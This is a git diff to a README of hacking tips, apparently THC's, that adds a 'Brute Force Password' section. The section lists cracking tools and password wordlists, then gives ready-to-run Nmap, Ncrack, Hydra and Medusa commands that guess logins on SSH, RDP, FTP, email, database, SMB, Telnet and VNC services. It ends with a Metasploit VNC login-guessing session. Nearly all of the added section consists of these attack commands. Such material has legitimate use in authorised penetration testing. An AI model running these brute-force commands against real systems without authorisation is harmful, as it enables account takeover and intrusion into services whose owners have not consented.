diff --git a/README.md b/README.md index 476a8c7..575e53b 100644 --- a/README.md +++ b/README.md @@ -28,6 +28,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Find your public IP address](#your-ip) 1. [Check reachability from around the world](#check-reachable) 1. [Check Open Ports](#check-open-ports) + 1. [Brute Force](#bruteforce) 1. [File Encoding and Transfer](#file-encoding) 1. [uuencode](#uuencode) 1. [openssl](#file-encoding-openssl) @@ -380,6 +381,123 @@ The fine people at [https://ping.pe/](https://ping.pe/) let you ping/traceroute/ curl https://internetdb.shodan.io/1.1.1.1 ``` + +**3.viii. Brute Force Password** + +(This list is curated by Joey (?)) + +Tools: +* [Ncrack](https://nmap.org/ncrack/) +* [Nmap BRUTE](https://nmap.org/nsedoc/categories/brute.html) +* [THC Hydra](https://sectools.org/tool/hydra/) +* [Medusa](http://foofus.net/goons/jmk/medusa/medusa.html) +* [Metasploit](https://docs.rapid7.com/metasploit/bruteforce-attacks/) + +Username & Password lists: +* `/usr/share/nmap/nselib/data` +* `/usr/share/wordlists/seclists/Passwords` +* https://github.com/danielmiessler/SecLists +* https://weakpass.com + + +Set **U**sername/**P**assword list and **T**arget host. +```shell +ULIST="/usr/share/wordlists/brutespray/mysql/user" +PLIST="/usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt" +T="192.168.0.1" +``` + +Nmap parameters: +```shell +--script-args userdb="${ULIST}",passdb="${PLIST}" +``` + +Ncrack parameters: +```shell +-U "${ULIST}" +-P "${PLIST}" +``` + +Hydra parameters: +```shell +-t4 # Limit to 4 tasks +-l root # Set username +-V # Show each login/password attempt +-s 31337 # Set port +-f # Exit after first valid login +``` + + +```shell +## SSH +nmap -p 22 --script ssh-brute --script-args ssh-brute.timeout=4s "$T" +ncrack -P "${PLIST}" --user root "ssh://${T}" +hydra -P "${PLIST}" -l root "ssh://$T" +``` + +```shell +## Remote Desktop Protocol / RDP +ncrack -P "${PLIST}" --user root -p3389 "${T}" +hydra -P "${PLIST}" -l root "rdp://$T" +``` + +```shell +## FTP +hydra -P "${PLIST}" -l user "ftp://$T" +``` + +```shell +## IMAP (email) +nmap -p 143,993 --script imap-brute "$T" +``` + +```shell +## POP3 (email) +nmap -p110,995 --script pop3-brute "$T" +``` + +```shell +## MySQL +nmap -p3306 --script mysql-brute "$T" +``` + +```shell +## PostgreSQL +nmap -p5432 --script pgsql-brute "$T" +``` + +```shell +## SMB (windows) +nmap --script smb-brute "$T" +``` + +```shell +## Telnet +nmap -p23 --script --script-args telnet-brute.timeout=8s telnet-brute "$T" +``` + +```shell +## VNC +nmap -p5900 --script vnc-brute "$T" +ncrack -P "${PLIST}" --user root "vnc://$T" +hydra -P "${PLIST}" "vnc://$T" +medusa -P "${PLIST}" –u root –M vnc -h "$T" +``` + +```shell +## Brute Force VNC with metasploit +msfconsole +use auxiliary/scanner/vnc/vnc_login +msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.1 +msf auxiliary(scanner/vnc/vnc_login) > set pass_file /usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt +msf auxiliary(scanner/vnc/vnc_login) > run +``` + --- ## 4. File Encoding